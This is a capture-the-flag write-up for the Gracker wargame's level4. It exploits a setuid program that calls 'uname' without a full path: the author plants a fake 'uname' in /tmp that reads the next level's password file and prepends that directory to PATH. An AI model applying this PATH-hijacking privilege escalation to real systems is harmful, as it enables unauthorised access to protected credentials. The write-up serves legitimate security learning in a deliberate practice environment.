Gracker level4 (We ourselves must walk the $PATH - Buddha)

Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.

We ssh to [email protected] and authenticate using the password we had obtained after solving the previous level.

Recap of previous level.

It is very important that you read the recap of the previous level. The recap has detailed explaination on how the stack works and examining the same using gdb. The solution I used is similar though.

Level4

Reading the story of level4 tells us that we’ll have to do in this challenge: find out how PATH works and how the command we enter gets executed.

PATH is an environment variable in Linux and other UNIX-like operating systems which specifies a set of directories where executable files are located. It informs the shell were to look for when a command is entered by the user. It is indeed one of the most important environment variables.

In this challenge the source code of the executable is available.

level4@gracker:/matrix/level4$ cat level4.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void main() {
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
    
    printf("Zero Cool - Linux Information Gathering Tool v1.2\n");
    printf("\n[*] Get system information:\n");
    system("uname -a");

    printf("\n[*] Find users available on this system:\n");
    system("cut -d: -f1,3,4 /etc/passwd");
    
    printf("\n[*] Search for setuid binaries:\n");
    system("find / -perm -4000 -exec ls -la {} \\; 2>/dev/null");
}

Thus on running the binary, we are not asked for any input or anything. The program just executes few commands like uname and cut. So what we can do is to change what these commands do. Like instead of having uname print the system information, we can have it print out the password to the next level.

For that first we’ll have to create an executable. Gracker allows us to create temporary files and folders in the temp directory. So we’ll need to do the following:

  • Create a temporary directory
  • Create a uname file in the directory with contents cat /home/level5/.pass
  • Make the uname file executable
[email protected]:/matrix/level4$ mkdir /tmp/feignix
[email protected]:/matrix/level4$ cd /tmp/feignix
[email protected]:/tmp/feignix$ touch uname
[email protected]:/tmp/feignix$ echo "cat /home/level5/.pass" > uname
[email protected]:/tmp/feignix$ chmod +x uname

Lets try to run this file.

[email protected]:/tmp/feignix$ ./uname
cat: /home/level5/.pass: Permission denied

It shows permission denied which is what we expected as we have level4 permissions and the to read the password we require level5 permissions. The program /matrix/level4/level4 has the owner as level5 and thus when it executes, it executes with level5 permissions and we will be able to read the password.

We now have to change the PATH environment variable so that the shell looks in our custom directory /tmp/feignix for executables, and that too before it looks in the directory where the original uname file will be present.

[email protected]:/matrix/level4$ printenv PATH
/usr/sbin/:/sbin/:/usr/local/bin:/usr/bin:/bin:/usr/games
[email protected]:/matrix/level4$ PATH="/tmp/feignix:$PATH"
[email protected]:/matrix/level4$ printenv PATH
/tmp/feignix:/usr/sbin/:/sbin/:/usr/local/bin:/usr/bin:/bin:/usr/games

Now that we have modified the PATH, all that remains is to run the level4 file

[email protected]:/matrix/level4$ ./level4
Zero Cool - Linux Information Gathering Tool v1.2

[*] Get system information:
************

[*] Find users available on this system:
level0:1000:1000
level1:1001:1001
level2:1002:1002
level3:1003:1003
level4:1004:1004
level5:1005:1005
level6:1006:1006
level7:1007:1007
level8:1008:1008
level9:1009:1009
level10:1010:1010
level11:1011:1011
level12:1012:1012
level13:1013:1013

[*] Search for setuid binaries:
-r-sr-x--- 1 level7 level6 6240 Jun 25  2015 /matrix/level6/level6
-r-sr-x--- 1 level5 level4 7704 Jun 20  2015 /matrix/level4/level4
-r-sr-x--- 1 level3 level2 8648 Jun 19  2015 /matrix/level2/level2
-r-sr-x--- 1 level12 level11 4996 Jun 22  2015 /matrix/level11/level11
-r-sr-x--- 1 level1 level0 8448 Jun 19  2015 /matrix/level0/level0
-r-sr-x--- 1 level10 level9 6148 Jun 26  2015 /matrix/level9/level9
-r-sr-x--- 1 level2 level1 8608 Jun 19  2015 /matrix/level1/level1
-r-sr-x--- 1 level4 level3 7856 Jun 20  2015 /matrix/level3/level3
-r-sr-x--- 1 level13 level12 5980 Jul  9  2015 /matrix/level12/level12
-r-sr-x--- 1 level11 level10 8104 Jul  1  2015 /matrix/level10/level10
-r-sr-x--- 1 level8 level7 5380 Jun 26  2015 /matrix/level7/level7

And voila! we have the password to the next level under [*] Get system information:. I have not shown the password here so that the readers try the challenge on their own.